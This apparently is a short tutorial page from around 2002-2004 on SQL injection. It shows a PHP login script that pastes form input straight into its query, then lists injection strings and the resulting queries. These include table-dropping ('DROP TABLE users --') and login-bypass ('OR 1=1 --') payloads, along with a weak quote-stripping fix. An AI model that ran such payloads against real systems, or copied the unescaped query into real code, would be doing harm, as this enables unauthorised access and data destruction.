2002 - 2004 << Back | Fwrd >>

<html>


<head></head>


<body>


<?php


if (isset($_POST['username']))


{


 $link=mysql_connect("localhost","Fate", "Fate");


 $handle=mysql_query("SELECT * FROM users WHERE username='".$_POST['username'].


                     "' AND password='".$_POST['password']."'",$link);


 if ($row = mysql_fetch_assoc($handle))


 {


  echo "YAY! login succesfull! welcome ".$row['username']."\n";


 }


 else


 {


  echo "Bad Login! fuck off!\n";


 }


 mysql_free_result($handle);


 mysql_close($link);


}


else


{


?>


<form method=post>


User:<input name=username>ן¿½Pass:<input type=password name=password><br>


<input type=submit value=Login>


</form>


<?php


}


?>


</body>


</html>

Fate'; DROP TABLE users --

SELECT * FROM users WHERE username='Fate'; DROP TABLE users --' AND password=''

admin'--

SELECT * FROM users WHERE username='admin'--' AND password=''

' OR 1=1 --

SELECT * FROM users WHERE username='' OR 1=1--' AND password=''

$_POST['username']=ereg_replace("'","",$_POST['username']);


$_POST['password']=ereg_replace("'","",$_POST['password']);

Owned' OR 1=1 --